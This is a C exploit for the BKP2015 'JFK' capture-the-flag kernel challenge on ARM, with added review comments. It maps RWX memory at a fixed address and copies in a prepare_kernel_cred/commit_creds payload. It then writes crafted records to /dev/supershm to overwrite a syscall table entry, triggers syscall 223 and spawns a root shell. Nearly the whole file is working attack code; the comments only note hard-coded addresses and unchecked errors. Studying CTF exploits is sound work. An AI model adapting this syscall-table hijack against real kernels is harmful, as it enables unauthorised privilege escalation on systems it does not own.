BKP2015 JFK
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
/*
 * Payload copied into the executable mapping set up in main() (see the
 * memcpy there). It calls two kernel routines through hard-coded
 * addresses; nothing here resolves them at runtime, so the values are
 * only meaningful for the exact challenge kernel build they were taken
 * from. Mitigations such as KASLR or restricted symbol exposure would
 * invalidate this approach.
 */
void get_root(void) {
/* Fixed kernel addresses for the challenge image; no lookup, no validation. */
void * (*prepare_kernel_cred)(void *) = (void *) 0xc00387f4;
void (*commit_cred)(void *) = (void *) 0xc00384b4;
/* Return value of prepare_kernel_cred(0) is passed straight through, unchecked. */
commit_cred(prepare_kernel_cred(0));
}
/*
 * Driver for the BKP2015 "JFK" challenge write-up. Stages a fixed RWX
 * mapping, writes three records to /dev/supershm, then triggers syscall
 * number 223 via an ARM svc and spawns a shell.
 *
 * Review notes (defensive reading):
 *  - Every address in this file is a hard-coded constant for one kernel
 *    build; the program cannot work anywhere else and does no checking.
 *  - Several error paths are unchecked (see inline comments).
 */
int main() {
//unsigned int syscall_table = 0xc0013e68;
//unsigned int addr = syscall_table + (223 * 4); // 0xc00141e4
/* Fixed-address, writable+executable anonymous mapping. */
char* buf = mmap((void *)0x42424000, 0x4000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
FILE *file;
/*
 * NOTE(review): mmap reports failure with MAP_FAILED ((void *)-1), which a
 * pointer comparison against 0 does not catch; on failure this check is
 * skipped and the memcpy below writes through an invalid pointer.
 */
if (buf <= 0) {
printf("ERROR\n");
exit(1);
}
// this requires compilation with -marm to avoid thumb code
/*
 * Copies 1024 bytes starting at get_root's entry point; that length is not
 * derived from the function's actual size, so the copy presumably reads
 * whatever follows get_root in .text as well.
 */
memcpy((char *) 0x42424240, (char *) &get_root, 1024);
/* Little-endian bytes of 0x42424240, the address used in the memcpy above. */
char* sc_addr = "\x40\x42\x42\x42";
// Overwrite the syscall table!
// set the fake structure
/*
 * NOTE(review): fopen's result is never checked; a missing or inaccessible
 * /dev/supershm makes the following fprintf dereference NULL. Same for the
 * two fopen calls below.
 */
file = fopen("/dev/supershm", "w");
/* The embedded bytes \xe4\x41\x01\xc0 are 0xc00141e4, the value in the commented-out addr computation. */
fprintf(file, "cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\xe4""\x41""\x01""\xc0""BBBBDDDD");
fclose(file);
// overwrite table
file = fopen("/dev/supershm", "w");
fprintf(file, "uDDDD");
fclose(file);
file = fopen("/dev/supershm", "w");
/*
 * Non-literal format string (CERT FIO30-C). Harmless only because sc_addr
 * contains no '%'; the conventional form is fprintf(file, "%s", sc_addr).
 */
fprintf(file, sc_addr);
fclose(file);
/* ARM Linux syscall convention: number in r7, trap with svc #0. */
asm("mov r7, #223" ::: "r7"); // syscall num
asm("svc 0x0");
char *args[] = {"/bin/sh", 0};
/* execv only returns on failure; that case is not reported here. */
execv("/bin/sh", args);
return 0;
}